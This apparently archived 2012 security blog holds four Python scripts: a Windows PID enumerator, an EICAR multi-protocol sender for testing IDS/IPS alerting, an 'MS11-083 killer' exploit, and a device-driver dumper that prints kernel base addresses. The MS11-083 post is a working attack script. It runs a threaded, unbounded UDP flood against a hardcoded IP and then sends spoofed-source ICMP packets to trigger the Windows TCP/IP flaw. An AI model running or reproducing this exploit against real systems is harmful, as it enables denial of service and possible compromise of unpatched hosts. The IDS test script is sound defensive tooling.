PID Enumeration on Windows with pure python ctypes
January 27, 2012
The following code enumerates process IDs on the current system by calling EnumProcesses from psapi on Windows. It should work for the majority of Windows installations that have psapi.dll in %systemroot%.
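from ctypes import *

psapi = windll.psapi


def getListOfProcesses():
    """Enumerate PIDs through psapi.EnumProcesses, print them and return the list.

    EnumProcesses only reports how many bytes it wrote, never how many it
    needed, so a buffer that comes back completely full may have been
    truncated.  The buffer is therefore doubled and the call repeated until
    it comes back with spare room, which is the documented way to get the
    complete list on hosts with more processes than a fixed array holds.

    Returns:
        list of int: the process IDs reported by the system.

    Raises:
        WindowsError: when EnumProcesses itself fails, instead of printing
        whatever happened to be in an untouched buffer.
    """
    count = 4096
    while True:
        pid_array = (c_ulong * count)()   # DWORD buffer handed to EnumProcesses
        bytes_returned = c_ulong()        # bytes actually written by the call
        if not psapi.EnumProcesses(byref(pid_array), sizeof(pid_array), byref(bytes_returned)):
            raise WinError()
        if bytes_returned.value < sizeof(pid_array):
            break                         # spare room left, so the list is complete
        count *= 2                        # completely full: may be truncated, retry larger

    nReturned = bytes_returned.value // sizeof(c_ulong)
    pids = list(pid_array)[:nReturned]
    for pid in pids:
        print "[+] Running Process PID %d" % pid
    return pids


if __name__ == "__main__":
    print "[+] PID dumper by Y"
    print "[+] contact : If you know me then give me a shout"
    getListOfProcesses()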
IDS/IPS Testing with EICAR
January 26, 2012
The following script attempts to submit the common EICAR anti-virus test string over multiple ports for an IDS/IPS system to alert on. It can be used to test how well an IDS picks up various malware that can be seen on the wire.
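# IMPORTS
import socket
import httplib, urllib
import ftplib
import telnetlib

# the eicar string to test with
EICAR = "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

############# CONFIGURATION #############
IP = "127.0.0.1"
TIMEOUT = 4      # seconds per connection, so one silent port cannot stall the whole run
############# END OF CONF #############


def info():
    """Print the banner and the list of ports the test run touches."""
    print "[+] Multi-Protocol EICAR tester by Y"
    print "[+] contact : If you know me then give me a shout"
    print "[+] Supports - HTTP, FTP, TELNET, SSL , TCP , UDP , DNS"
    print "[+] NOTE: Set NC listener on specific ports between the hosts and DIS and watch IDS alerting on protocols"
    print "[+] Following ports are used: 21(TCP),23(TCP),25(TCP),100(UDP),80(TCP),22(TCP),443(TCP),53(UDP)"


def _send_http_verbs(conn, data, label):
    """Issue HEAD, GET, POST, PUT and DELETE carrying *data* over *conn*.

    Each verb is attempted on its own: the far end is expected to be a plain
    listener that never answers, so a failure on one verb must not stop the
    others from reaching the wire.  *data* rides in the request line for all
    verbs except POST, where it is form-encoded into the body.  *label* only
    names the protocol in the progress output.
    """
    print "[+] Sending %s request" % label
    for verb in ("HEAD", "GET", "POST", "PUT", "DELETE"):
        try:
            print "\t %s" % verb
            if verb == "POST":
                params = urllib.urlencode({'eicar': data})
                headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
                conn.request("POST", "", params, headers)
            else:
                conn.request(verb, data)
        except Exception, e:
            # best effort by design; report the failure instead of hiding it
            print "\t [-] %s failed : %s" % (verb, e)


def sendHTTP(data, target, port):
    """Send *data* to target:port over plain HTTP with every common verb."""
    try:
        conn = httplib.HTTPConnection(target, port, timeout=TIMEOUT)
        _send_http_verbs(conn, data, "HTTP")
        conn.close()
    except Exception, e:
        print "[-] Unable to send HTTP data due to : ", e


def sendFTP(data, target, port):
    """Send *data* as a single raw FTP line to target:port."""
    try:
        print "[+] Sending FTP request"
        ftp = ftplib.FTP()
        ftp.connect(target, port, TIMEOUT)
        ftp.putline(data)   # send single EICAR request
        ftp.close()
    except Exception, e:
        print "[-] Unable to send FTP data due to : ", e


def sendTelnet(data, target, port):
    """Send *data* over a telnet session to target:port."""
    try:
        print "[+] Sending TELNET request"
        tn = telnetlib.Telnet(target, port, TIMEOUT)
        tn.write(data)
        tn.close()
    except Exception, e:
        print "[-] Unable to send TELNET data due to : ", e


def sendSMTP(data, target, port):
    """Deliver *data* as the body of a minimal SMTP transaction to target:port.

    Every command is CRLF-terminated and the DATA section is closed with the
    lone-dot line, so the exchange is framed the way an SMTP parser (or an
    IDS SMTP preprocessor) expects rather than as one run-on line.
    """
    try:
        print "[+] Sending SMTP request"
        tn = telnetlib.Telnet(target, port, TIMEOUT)
        for command in ("HELO localhost", "MAIL FROM: root@localhost", "RCPT TO: root@localhost", "DATA"):
            tn.write(command + "\r\n")
        tn.write(data + "\r\n")
        tn.write(".\r\n")        # end of DATA section
        tn.write("QUIT\r\n")
        tn.close()
    except Exception, e:
        print "[-] Unable to send SMTP data due to : ", e


def sendSSH(data, target, port):
    """Placeholder: SSH delivery is not implemented."""
    pass


def sendSSL(data, target, port):
    """Send *data* to target:port over HTTPS with every common verb."""
    try:
        conn = httplib.HTTPSConnection(target, port, timeout=TIMEOUT)
        _send_http_verbs(conn, data, "HTTPS")
        conn.close()
    except Exception, e:
        print "[-] Unable to send HTTPS data due to : ", e


def sendICMP(data, target):
    """Placeholder: ICMP delivery is not implemented."""
    pass


def sendRCP(data, target, port):
    """Placeholder: RPC delivery is not implemented."""
    pass


def sendTCP(data, target, port):
    """Send *data* as a raw TCP stream to target:port.

    The timeout is set on this socket only; the original changed the
    process-wide default, which silently affected every later connection.
    """
    try:
        print "[+] Sending TCP data "
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(TIMEOUT)
        try:
            s.connect((target, int(port)))
            s.sendall(data)   # sendall, so a short write cannot drop part of the string
        finally:
            s.close()
    except Exception, e:
        print "[-] Unable to send TCP data due to : ", e


def sendUDP(data, target, port):
    """Send *data* as a single UDP datagram to target:port."""
    try:
        print "[+] Sending UDP data "
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.sendto(data, (target, int(port)))
        finally:
            sock.close()
    except Exception, e:
        print "[-] Unable to send UDP data due to : ", e


def sendNETBIOS(data, target, port):
    """Placeholder: NetBIOS delivery is not implemented."""
    pass


def sendDNS(data, target, port):
    """Send *data* to the DNS port; it is a plain UDP datagram, not a real query."""
    try:
        print "[+] Sending DNS request "
        sendUDP(data, target, port)   # dirty trick
    except Exception, e:
        print "[-] Unable to send DNS data due to : ", e


def end():
    """Print the closing hint."""
    print "Done, now review IDS logs for each protocol"


def start_test():
    """Run the whole protocol sweep against IP in the order the banner lists."""
    info()
    sendFTP(EICAR, IP, 21)
    sendTelnet(EICAR, IP, 23)
    sendSMTP(EICAR, IP, 25)
    sendUDP(EICAR, IP, 100)
    sendHTTP(EICAR, IP, 80)
    sendTCP(EICAR, IP, 22)
    sendSSL(EICAR, IP, 443)
    sendDNS(EICAR, IP, 53)   # sent once; the original issued this call twice
    # TODO:
    # Protocol play ( these are HPING2 wrappers )
    # sendICMP(EICAR, '192.168.2.79')
    # sendRCP(EICAR, '192.168.2.79', 445)
    # sendNETBIOS(EICAR, '192.168.2.79', 139)
    # sendSSH(EICAR, '192.168.2.79', 22)
    end()


if __name__ == "__main__":
    # start the test
    start_test()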
MS11-083 killer
January 26, 2012
The following code attempts to exploit MS11-083 by sending specially crafted packets to a closed UDP port (read more here).
# Reproducer for the Windows TCP/IP issue addressed by Microsoft bulletin MS11-083.
# What the code below does: ThreadCount threads send MESSAGE to one closed UDP port
# from a shared non-blocking datagram socket, and customPing() emits ICMP echo
# requests with a forged source address over a raw socket.  It needs the third-party
# dpkt package, and raw sockets generally need elevated privileges (verify per platform).
# Defender view: the traffic is a sustained UDP flood to a closed port (which draws
# ICMP port-unreachable replies) followed by spoofed-source echo requests -- a pattern
# a network IDS can alert on; note the flood is unbounded as written (see run()).
import socket
import threading
try:
    from dpkt.ip import IP
    from dpkt.icmp import ICMP
except:
    print "install dpkt if you want this program to run!"
print "[+] MS11-083 killer by Y"
print "[+] contact : If you know me then give me a shout"
############ EDIT THIS #################
UDP_IP="192.168.93.15"
UDP_PORT=839
MESSAGE="\x44\x44\x44\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00"
ThreadCount = 32
########################################
print " [+]UDP target IP:", UDP_IP
print " [+]UDP target port:", UDP_PORT
print " [+]UDP payload lenght:", len(MESSAGE)
def customPing(UDP_IP,repeat):
    # Build an IP/ICMP echo request with dpkt and send it ten times over a raw
    # socket.  The source address is forged (1.2.3.4), so replies never come back
    # here.  `repeat` is accepted but not read; the loop count is the literal 10.
    # craft custom ping
    dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC"
    ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1)   # p=1 selects ICMP as the payload protocol
    icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC))   # type 8 = echo request
    ip.data = icmp
    ip.len += len(ip.data)   # IP total length must cover the ICMP payload just attached
    print "[+] Building socket for final ping"
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW)
    s.connect((UDP_IP, 1))
    # sending packet
    print "[+] Sending final ping ( debug trap ) "
    for x in range(10):
        s.send(str(ip))
try:
    print "\t[+] Running UDP attack against -> ", UDP_IP , "on port " , UDP_PORT
    s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
    s.setblocking(0) # set non-blocking mode; sendto never waits, so errors surface as exceptions
    class ThreadClass(threading.Thread):
        # One flooding thread; all threads share the module-level socket `s`.
        def run(self):
            c = 0
            # NOTE(review): `c` is never incremented, so this loop does not terminate and
            # the statements after it are never reached; each thread sends without bound.
            while c<(4294967296/ThreadCount): # 2^32 requests to overflow the counter
                s.sendto( MESSAGE, (UDP_IP,UDP_PORT ))
            # trigger the actual attack via ICMP messages ( the payload can probably trigger command execution !?)
            print "[+] Triggering actual attack "
            customPing(UDP_IP,20)
    for i in range(ThreadCount):
        t = ThreadClass()
        t.start()
        print "[+] Thread ",i," is starting and its name is : " , t.getName()
except Exception,e:
    # Only exceptions raised on this thread (socket setup, thread start) land here;
    # errors inside run() are reported by the threading module, not caught by this block.
    print " [-] Exception occured, reason : " , e
Note that this code is only for educational purposes and I do not take responsibility for any misuse.
Dumping Drivers on Windows
January 16, 2012
Ever wondered how to list all the drivers on your Windows machine? Here is a quick answer coded in Python that will hopefully help some people.
from ctypes import * #Windows modules loader kernel32 = windll.kernel32 psapi = windll.psapi class drivers(): def getAllDeviceDrivers(self): lpcbNeeded = c_ulong(0) empty_init_array = c_ulong * 1024 lpImageBase = empty_init_array() drivername_size = c_long() drivername_size.value = 48 if psapi.EnumDeviceDrivers(byref(lpImageBase),sizeof(c_void_p)*1024,byref(lpcbNeeded)): no_drivers = int(lpcbNeeded.value / sizeof(c_void_p)) print "[*] EnumDeviceDrivers: %d modules detected" % no_drivers print "\t[+] Dumping all device drivers" for baseaddy in lpImageBase: drivername = c_char_p("\x00"*drivername_size.value) if baseaddy: psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, drivername_size.value) driverpath = c_char_p("\x00"*drivername_size.value) psapi.GetDeviceDriverFileNameA(baseaddy,driverpath,drivername_size.value) # if we have drivers with addresses allocated within 0x80000000 and 0xFFFFFFFF they loaded directly kernel if baseaddy > 2147483648 and baseaddy < 4294967295: print "\t\t [-] Kernel Driver",drivername.value.lower(),"is located on 0x%08x load path is %s" % (baseaddy,driverpath.value.lower()) else: # user level drivers are within 0x00000000 and 0x7FFFFFFF print "\t\t [-] User Driver",drivername.value.lower(),"is located on 0x%08x load path is %s" % (baseaddy,driverpath.value.lower()) drivers = drivers() drivers.getAllDeviceDrivers()